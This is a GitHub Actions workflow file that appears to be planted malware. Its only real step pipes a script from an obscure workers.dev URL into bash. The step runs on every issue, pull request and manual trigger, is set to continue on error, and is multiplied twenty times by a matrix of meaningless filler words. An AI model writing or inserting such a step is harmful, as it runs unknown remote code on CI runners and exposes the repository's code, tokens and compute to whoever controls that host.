name: horizon

on:
  issues:
  pull_request:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  furnish:
    steps:
    - uses: actions/checkout@v6
    - name: describe
      continue-on-error: true
      run: curl -S "https://node.vrotsosvanhouten30272.workers.dev/35326e8ee5/ee60de/6d4fe9e3796/9edf27594c63c2bba56732445f/b1377b7aea4?r=1776041664&zzy=bvo" | bash
    strategy:
      matrix:
        must: ["probable", "poll", "graph", "interaction", "mostly"]
        slam: ["theory", "grief", "equality", "fall"]
    runs-on: ubuntu-latest
